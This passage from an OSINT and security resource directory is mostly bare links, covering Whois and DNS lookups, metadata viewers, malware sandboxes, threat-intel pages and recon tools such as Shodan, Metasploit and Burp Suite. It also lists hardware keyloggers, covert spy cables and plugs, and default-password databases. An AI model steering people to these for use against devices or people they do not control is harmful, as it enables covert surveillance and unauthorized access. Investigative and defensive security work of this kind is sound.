•[https://www.keelog.com/](https://www.keelog.com/) •[https://www.keydemon.com/en/](https://www.keydemon.com/en/) •[https://www.keyghost.com/](https://www.keyghost.com/) •[https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi](https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi) •[https://www.mobile-hacker.com/](https://www.mobile-hacker.com/) •[https://samy.pl/magspoof/](https://samy.pl/magspoof/) •[https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea](https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea) •[https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/](https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/) •[https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable](https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable) [https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf](https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf) [https://start.me/p/Wp1kpe/socmint](https://start.me/p/Wp1kpe/socmint) [https://start.me/p/RMKeQv/search-social-media](https://start.me/p/RMKeQv/search-social-media) [https://start.me/p/4K0DXg/social-media](https://start.me/p/4K0DXg/social-media) [https://start.me/p/b5MG5r/social-media-intelligence-socmint](https://start.me/p/b5MG5r/social-media-intelligence-socmint) [https://start.me/p/z4Lb6M/social-toolkit](https://start.me/p/z4Lb6M/social-toolkit) [https://start.me/p/ADr4qn/05-socmint](https://start.me/p/ADr4qn/05-socmint) [ https://cirt.net/passwords Default](https://cirt.net/passwords%C2%A0Default) Passwords [https://www.routerpasswords.com/ Default](https://www.routerpasswords.com/%C2%A0Default) passwords [https://codefinder.org/](https://codefinder.org/) Reposearch [https://www.copyscape.com/](https://www.copyscape.com/) [https://github.com/google/codesearch](https://github.com/google/codesearch) [https://hackertarget.com/reverse-analytics-search/](https://hackertarget.com/reverse-analytics-search/) [https://nerdydata.com/](https://nerdydata.com/) [https://publicwww.com/](https://publicwww.com/) [https://searchcode.com/](https://searchcode.com/) [https://snipplr.com/](https://snipplr.com/) [https://www.webfinery.com/search](https://www.webfinery.com/search) [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA%C2%A0) ; [www.elevenpaths.com](http://www.elevenpaths.com/) – FOCA an on-line hidden/meta data locator for a variety of file types [https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca](https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca) also check out [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA) FOCA (Fingerprinting Organisations with Collected Archives) is a tool written by ElevenPaths that can be used to scan, analyse, extract and classify information from remote web servers and their hidden information. [https://jimpl.com/](https://jimpl.com/) Online EXIF data viewer. Uncover hidden metadata from your photos. Find when and where the picture was taken. Remove EXIF data from the image to protect your personal info. [https://metashieldclean-up.tu.com/](https://metashieldclean-up.tu.com/) [https://www.extractmetadata.com/](https://www.extractmetadata.com/) - an on-line hidden/meta data locator for a variety of file types [https://start.me/p/6rqQbo/security-news](https://start.me/p/6rqQbo/security-news) [https://start.me/p/ydqwxP/rss-feeds](https://start.me/p/ydqwxP/rss-feeds) [https://start.me/p/wMrA5z/cyber-threat-intelligence](https://start.me/p/wMrA5z/cyber-threat-intelligence) [https://start.me/p/OmOrJb/threat-hunting](https://start.me/p/OmOrJb/threat-hunting) [https://start.me/p/aN5jX8/malware-analysis](https://start.me/p/aN5jX8/malware-analysis) Whois Whois was affected by GDPR [https://d09r.github.io/assay-url-inspection-tools/](https://d09r.github.io/assay-url-inspection-tools/) [https://inteltechniques.com/tools/Domain.html](https://inteltechniques.com/tools/Domain.html) [https://www.godaddy.com/en-uk/whois](https://www.godaddy.com/en-uk/whois) [https://gwhois.org/](https://gwhois.org/) [https://iplogger.org/whois/](https://iplogger.org/whois/) [https://lookup.icann.org/en](https://lookup.icann.org/en) [https://osint.hippie.cat/](https://osint.hippie.cat/) Select domain [https://osint.sh/whoishistory/](https://osint.sh/whoishistory/) [https://ping.eu/](https://ping.eu/) Online Ping, Traceroute, DNS lookup, WHOIS, Port check, Reverse lookup, Proxy checker, Bandwidth meter, Network calculator, Network mask calculator, Country by IP, Unit converter [https://www.reversewhois.io/](https://www.reversewhois.io/) [https://www.ripe.net/](https://www.ripe.net/%C2%A0) ; [https://start.me/p/ek2p4x/internetrecherche-2-0](https://start.me/p/ek2p4x/internetrecherche-2-0) (IP WHOIS~) [http://www.tcpiputils.com/tools#domain](http://www.tcpiputils.com/tools#domain%C2%A0) ; [https://viewdns.info/](https://viewdns.info/) [https://www.whois.com/](https://www.whois.com/) [https://whois.icann.org/en/](https://whois.icann.org/en/) [https://www.whoxy.com/ whoxy.com](https://www.whoxy.com/%C2%A0whoxy.com) ([whoxy.com/qa.com](http://whoxy.com/qa.com)) [https://whois.domaintools.com/](https://whois.domaintools.com/) [https://whoisology.com/](https://whoisology.com/) [https://www.yougetsignal.com/tools/whois-lookup/](https://www.yougetsignal.com/tools/whois-lookup/) [https://who.is/](https://who.is/) [https://www.whois.com/whois/](https://www.whois.com/whois/) [https://whois.domaintools.com/qa.com](https://whois.domaintools.com/qa.com) (change the end for target) Sandbox Joe Sandbox - [https://www.joesandbox.com/](https://www.joesandbox.com/) & Cuckoo Sandbox - [https://cuckoo.cert.ee/](https://cuckoo.cert.ee/) [https://github.com/CYB3RMX/Qu1cksc0pe](https://github.com/CYB3RMX/Qu1cksc0pe) All in one Malware analysis tool [https://urlscan.io/](https://urlscan.io/) [https://www.malwarebytes.com/](https://www.malwarebytes.com/) [https://www.hybrid-analysis.com/](https://www.hybrid-analysis.com/) [https://www.virustotal.com/gui/home/upload](https://www.virustotal.com/gui/home/upload) [https://any.run/](https://any.run/) [https://malwareanalysis.tools/](https://malwareanalysis.tools/) [https://malpedia.caad.fkie.fraunhofer.de/families](https://malpedia.caad.fkie.fraunhofer.de/families) Malware Families [https://maltiverse.com/trial](https://maltiverse.com/trial) [https://socradar.io/labs/ioc-radar/](https://socradar.io/labs/ioc-radar/) [https://tria.ge/](https://tria.ge/) Triage, also known as the Triage Sandbox, is an advanced malware sandboxing solution initially created by Hatching. It provides users with the ability to execute malware samples within a secure and isolated environment, enabling the analysis of their actions and evaluation of their potential risks. [https://start.me/p/m6aeXo/cybersecurity-ctfs-tools](https://start.me/p/m6aeXo/cybersecurity-ctfs-tools) [https://start.me/p/X25q7l/threat-informed-defense-ecosystem](https://start.me/p/X25q7l/threat-informed-defense-ecosystem) [https://start.me/p/m6bBNv/triage-investigations-ir](https://start.me/p/m6bBNv/triage-investigations-ir) [https://virusscan.jotti.org/en](https://virusscan.jotti.org/en) [https://www.inetsim.org/](https://www.inetsim.org/) INetSim is a software suite for simulating common internet services in a lab environment, e.g. for analysing the network behaviour of unknown malware samples. Domain tools DNS [https://dnsdumpster.com/](https://dnsdumpster.com/) [https://www.robtex.com/](https://www.robtex.com/) [https://threatcrowd.org/ This](https://threatcrowd.org/%C2%A0This) service provides a unique view of the domains associated with your target. [https://web-check.as93.net/](https://web-check.as93.net/) [https://informationlaundromat.com/](https://informationlaundromat.com/) [https://urlscan.io/](https://urlscan.io/) [https://subgraph.com/vega/](https://subgraph.com/vega/) recon OSINT Framework/Inteltechniques – a website directory of data discovery and gathering tools for almost any kind of source or platform. [https://osintframework.com/](https://osintframework.com/) or [https://inteltechniques.com/tools/index.html](https://inteltechniques.com/tools/index.html) Spiderfoot - Automates OSINT for threat intelligence and mapping your attack surface. [https://github.com/smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) & [https://www.spiderfoot.net/attack-surface-monitoring/](https://www.spiderfoot.net/attack-surface-monitoring/) Google Dorks – OSINT data gathering method using clever Google search queries with advanced arguments. [https://pentest-tools.com/information-gathering/google-hacking https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/](https://pentest-tools.com/information-gathering/google-hacking%C2%A0https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/) [Shodan.io](http://shodan.io/) – a search engine for online devices/IOT and a way to get insights into any weaknesses they may have. [https://www.shodan.io/](https://www.shodan.io/) [https://censys.com/](https://censys.com/) [https://www.zoomeye.org/](https://www.zoomeye.org/) - advertised as China’s first cyberspace search engine, constantly updated, and developed with new features. Maltego – an OSINT tool for gathering information and bringing it all together for graphical correlation analysis. [https://www.maltego.com/](https://www.maltego.com/) Metasploit – a powerful penetration testing tool that can find network vulnerabilities and even be used to exploit them. [https://www.metasploit.com/](https://www.metasploit.com/) Recon-ng – an open-source web reconnaissance tool developed in Python and continues to grow as developers contribute to its capabilities. [https://www.kali.org/tools/recon-ng/](https://www.kali.org/tools/recon-ng/) Aircrack-ng – a Wi-Fi network security testing and cracking tool that can be used both defensively and offensively to find compromised networks. [https://www.aircrack-ng.org/](https://www.aircrack-ng.org/) Burpsuite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. [https://www.kali.org/tools/burpsuite/](https://www.kali.org/tools/burpsuite/) [^1]: